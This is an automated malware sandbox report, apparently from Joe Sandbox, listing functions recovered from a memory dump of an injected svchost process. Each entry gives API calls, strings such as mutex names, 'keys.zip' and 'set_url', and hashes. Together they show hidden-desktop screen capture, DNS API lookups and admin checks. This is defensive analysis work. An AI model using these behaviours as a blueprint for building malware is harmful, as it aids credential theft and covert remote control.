                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02C783BD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$HandleMutexObjectReleaseSingleViewWait$CloseCreateDesktopFreeHeapInformationMappingThreadUnmap
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 2125184990-3387790918
                                                                                                                                                                                                                    • Opcode ID: 3d0d9e5a832b1a5d5dcd235c828ed90d58ccb9c141292ec40fc273a3ff7295ab
                                                                                                                                                                                                                    • Instruction ID: 3d477f1b7a102f56b4d127cad5f1c2a6d0e46db0bc53025ec961f26a942f3015
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d0d9e5a832b1a5d5dcd235c828ed90d58ccb9c141292ec40fc273a3ff7295ab
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1441A171E80344ABD7119B74EC59F6A77A9EB88711F208F49FA11972C0CB74A920DFA0
                                                                                                                                                                                                                    Function 02C7F300 Relevance: 21.1, APIs: 14, Instructions: 109memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F32B
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F32E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,02C7F84A,00000000,?), ref: 02C7F33B
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F33E
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(?,00000000,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F357
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,02C7F84A,00000000,?), ref: 02C7F368
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F378
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F37B
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,02C7F84A,00000000,?), ref: 02C7F388
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F38B
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F39B
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F39E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,02C7F84A,00000000,?), ref: 02C7F3AB
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F3AE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$FreeValidate$Handle$CloseInformation
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2935687291-0
                                                                                                                                                                                                                    • Opcode ID: d4623eed16cd5b81bbe464dcc97bed0d395a8c6cc79f28935bf282846adab503
                                                                                                                                                                                                                    • Instruction ID: c67f42e586b1c9d74857217d00ebd9190e317d3f43df894b3a5983a969eb7d9b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4623eed16cd5b81bbe464dcc97bed0d395a8c6cc79f28935bf282846adab503
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5431F031E853606BDB25AF61E8C8B5B7BACFF88B25F04856AED09D7240C735C500CAE1
                                                                                                                                                                                                                    Function 02C80820 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 89memorystringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C80825
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,7622F550,76231620,80000002,?,?,02C84818), ref: 02C80872
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,02C84818), ref: 02C80875
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C84818), ref: 02C80882
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,02C84818), ref: 02C80885
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C8089B
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C808B9
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,02C84818), ref: 02C808E7
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,?,?,02C84818), ref: 02C808EA
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,02C84818), ref: 02C808F7
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,02C84818), ref: 02C808FA
                                                                                                                                                                                                                      • Part of subcall function 02C80570: memset.MSVCRT ref: 02C805A3
                                                                                                                                                                                                                      • Part of subcall function 02C80570: memset.MSVCRT ref: 02C805BB
                                                                                                                                                                                                                      • Part of subcall function 02C80570: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,80000002,?,?,?,?,7622F550,76231620), ref: 02C805DC
                                                                                                                                                                                                                      • Part of subcall function 02C80570: RegQueryValueExA.ADVAPI32(80000002,80F50209a,00000000,00000001,?,00000104,?,?,?,?,7622F550,76231620), ref: 02C80603
                                                                                                                                                                                                                      • Part of subcall function 02C80570: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,?,?,7622F550,76231620), ref: 02C8068D
                                                                                                                                                                                                                      • Part of subcall function 02C80570: HeapAlloc.KERNEL32(00000000,?,?,?,?,7622F550,76231620), ref: 02C80694
                                                                                                                                                                                                                      • Part of subcall function 02C80570: memset.MSVCRT ref: 02C806A3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$memset$FreeValidatestrstr$AdminAllocOpenQueryUserValue
                                                                                                                                                                                                                    • String ID: set_url
                                                                                                                                                                                                                    • API String ID: 3462927349-1295111526
                                                                                                                                                                                                                    • Opcode ID: cda620ee7f2803b62b935c1a84ab0733a82987d75eb891d8c4ea899b9dbdd7a6
                                                                                                                                                                                                                    • Instruction ID: d2685373e9730747ddc9d2bdb1d73698abc7836ff454eabe2fa69123fa625bc9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cda620ee7f2803b62b935c1a84ab0733a82987d75eb891d8c4ea899b9dbdd7a6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6212632E8637567E63236615C09F5B6A889FC0B59F098664ED08BB240EB61DE48C6F1
                                                                                                                                                                                                                    Function 02C92A30 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 56sleepsynchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02C92A4C
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C92A62
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02C92A70
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C92A79
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C92A91
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C92AA3
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf8b2), ref: 02C92AAE
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bf8b2,VEFK), ref: 02C92AC8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                                    • String ID: 7f1bf8b2$Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0#v$VEFK
                                                                                                                                                                                                                    • API String ID: 849374196-3775063419
                                                                                                                                                                                                                    • Opcode ID: b80cf928594d81234f7e93009e373ef2cb61e057972e65856da3ba67c5e8679a
                                                                                                                                                                                                                    • Instruction ID: cf5307aaa716208c13d45688a6128ea76d6d682987b08c38524c8f77d182b2d5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b80cf928594d81234f7e93009e373ef2cb61e057972e65856da3ba67c5e8679a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6901FE32EC57543BFB22A7619C0DF5A778CAF44B20F044658FD8597181DFB0951046EB
                                                                                                                                                                                                                    Function 02C8D990 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 56sleepsynchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}), ref: 02C8D9AC
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C8D9C2
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}), ref: 02C8D9D0
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8D9D9
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8D9F1
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8DA03
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfd65), ref: 02C8DA0E
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bfd65,CRAIF), ref: 02C8DA28
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                                    • String ID: 7f1bfd65$CRAIF$Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$P0#v
                                                                                                                                                                                                                    • API String ID: 849374196-2439100428
                                                                                                                                                                                                                    • Opcode ID: bece56cc50f7c0badeb0bb4b249e25c43607e4c03d99266cf82caa41d85d5bc1
                                                                                                                                                                                                                    • Instruction ID: 104e8e4c2d7b88b54f5b5cd2b4d18fb869c1bcacf3b05097bf7c6afeb6e5f25f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bece56cc50f7c0badeb0bb4b249e25c43607e4c03d99266cf82caa41d85d5bc1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F401D632EC47547AF312A7B15C0AF5A738CAF44B28F158664F909A31C1DBB499008AA6
                                                                                                                                                                                                                    Function 02C75940 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53libraryloadernetworkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C75940
                                                                                                                                                                                                                    • DnsFlushResolverCache.DNSAPI ref: 02C7594A
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,75AF7390), ref: 02C7595A
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02C75973
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 02C7598F
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 02C759AB
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Query_Main), ref: 02C759C7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$AdminCacheFlushLibraryLoadResolverUser
                                                                                                                                                                                                                    • String ID: DnsQuery_A$DnsQuery_UTF8$DnsQuery_W$Dnsapi.dll$Query_Main
                                                                                                                                                                                                                    • API String ID: 2466897691-3547598143
                                                                                                                                                                                                                    • Opcode ID: a2de0311593b83e19bab61a1b851fb9f8a9320d1bfd5ea6f19e30cd09f312231
                                                                                                                                                                                                                    • Instruction ID: 8eefb0f407ac36fa6f6afb46c2e1072f14246f73863aaabdf619568f93586068
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2de0311593b83e19bab61a1b851fb9f8a9320d1bfd5ea6f19e30cd09f312231
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74018671BC435676B91231751C0AF4B972E4EC0ED5F9206B4FC12F2444DB96E20388B8
                                                                                                                                                                                                                    Function 02C7B9D0 Relevance: 19.6, APIs: 13, Instructions: 116windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 02C7B9ED
                                                                                                                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 02C7B9FC
                                                                                                                                                                                                                      • Part of subcall function 02C7CC80: GetClassNameA.USER32(?,?,00000101), ref: 02C7CC96
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 02C7BA39
                                                                                                                                                                                                                    • GetClassLongA.USER32(00000000,000000E6), ref: 02C7BA42
                                                                                                                                                                                                                    • PrintWindow.USER32(00000000,?,00000000,?,762330D0,?,?,?,02C7843E), ref: 02C7BA55
                                                                                                                                                                                                                    • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?,?,762330D0,?,?,?,02C7843E), ref: 02C7BA7B
                                                                                                                                                                                                                    • CreateRectRgn.GDI32(?,?,02C7843E,?), ref: 02C7BA91
                                                                                                                                                                                                                    • GetWindowRgn.USER32(00000000,00000000), ref: 02C7BA9B
                                                                                                                                                                                                                    • OffsetRgn.GDI32(00000000,?,?), ref: 02C7BAB5
                                                                                                                                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 02C7BAC0
                                                                                                                                                                                                                    • BitBlt.GDI32(?,?,?,02C7843E,?,?,00000000,00000000,00CC0020), ref: 02C7BAE9
                                                                                                                                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 02C7BAF2
                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 02C7BAF5
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ClassClipRectSelect$CreateDeleteLongNameObjectOffsetPrintRedrawVisible
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3597830993-0
                                                                                                                                                                                                                    • Opcode ID: 67a26ccbdca2ca42c6637e339f99ddf5f65e0949e96558e05bc8d35b703e6993
                                                                                                                                                                                                                    • Instruction ID: e0fbb222fdb7a689cd4738f8298ab91a3c5c0875cd4c5c97c898b7d6531adc1c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67a26ccbdca2ca42c6637e339f99ddf5f65e0949e96558e05bc8d35b703e6993
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4315E71E80114AFD715EBA5DC89FBF7BB8EF89B14F104648FA01A3180DB74AD118A70
                                                                                                                                                                                                                    Function 02C7CAA0 Relevance: 19.6, APIs: 13, Instructions: 113filesynchronizationmemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02C7CAA8
                                                                                                                                                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAB9
                                                                                                                                                                                                                      • Part of subcall function 02C7C9F0: GetComputerNameA.KERNEL32(02CBD6A8,?), ref: 02C7CA07
                                                                                                                                                                                                                      • Part of subcall function 02C7C9F0: lstrlenA.KERNEL32(02CBD6A8,?,?,02C861D1), ref: 02C7CA12
                                                                                                                                                                                                                      • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA52
                                                                                                                                                                                                                      • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA62
                                                                                                                                                                                                                      • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA72
                                                                                                                                                                                                                      • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA7F
                                                                                                                                                                                                                      • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA8C
                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02CBD6C0), ref: 02C7CAE3
                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAFC
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: SetThreadDesktop.USER32(?,7622F590,762216B0,00000000), ref: 02C780BF
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: GetDC.USER32(00000000), ref: 02C780C7
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02C780D8
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: GetDeviceCaps.GDI32(00000000,00000008), ref: 02C780E9
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02C78100
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02C78142
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02C78152
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: DeleteObject.GDI32(00000000), ref: 02C78155
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: ReleaseDC.USER32(00000000,00000000), ref: 02C7815E
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C781B9
                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CBD66C), ref: 02C7CB29
                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB3C
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,02CBD790,?,?,02C77262,00000000,00000000), ref: 02C7CB5A
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB6B
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,02CBD750,?,?,02C77262,00000000,00000000), ref: 02C7CB7F
                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB98
                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBAB
                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBBE
                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,02CBD6FC,?,?,02C77262,00000000,00000000), ref: 02C7CBD4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Create$wsprintf$EventFile$Mutex$BitsCapsDeviceHeapMappingView$BitmapCompatibleComputerCountDeleteDesktopFreeNameObjectReleaseThreadTicklstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2940656088-0
                                                                                                                                                                                                                    • Opcode ID: a3c7da03c06e7baacfa3e58cff91971bdf7a1da4547cc210a681c6769fa2a69e
                                                                                                                                                                                                                    • Instruction ID: 7143cfbcd07b478516294d572ce1f76d00f89f23f1645128c4751ac3e455c077
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3c7da03c06e7baacfa3e58cff91971bdf7a1da4547cc210a681c6769fa2a69e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37315870FC47067AFA625B799C43F552A98AB84F11F240A67B705FE1C1DAE0E2108A69
                                                                                                                                                                                                                    Function 02C8F870 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 139COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFF41,?,7693BF00), ref: 02C8F8A0
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,7693BF00), ref: 02C8F8E1
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,7693BF00), ref: 02C8F8EB
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8F8F3
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F904
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,7693BF00), ref: 02C8F90B
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,7693BF00), ref: 02C8F918
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFF41,?,?,?,7693BF00), ref: 02C8F987
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                                    • String ID: 7F1BFF41$keys.zip$path1.txt
                                                                                                                                                                                                                    • API String ID: 1373881290-2169523781
                                                                                                                                                                                                                    • Opcode ID: bbaf34f06708c7ce2f5536714c3757120cb9e9ddce496b7b0d81e9858fbe9e24
                                                                                                                                                                                                                    • Instruction ID: 29d7d588c098d824c285a5ef575a4294df5b1a72b2e407bb19de8d166829a7dc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bbaf34f06708c7ce2f5536714c3757120cb9e9ddce496b7b0d81e9858fbe9e24
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E415B315002455FCB16DF2498A87E7BBE9EF85304F54C5E8D9C9C7600EB70DA49C790
                                                                                                                                                                                                                    Function 02C92180 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 138COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF93B), ref: 02C921B0
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C921F1
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C921FB
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C92203
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92214
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C9221B
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C92228
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF93B,?,02C923DC), ref: 02C92297
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
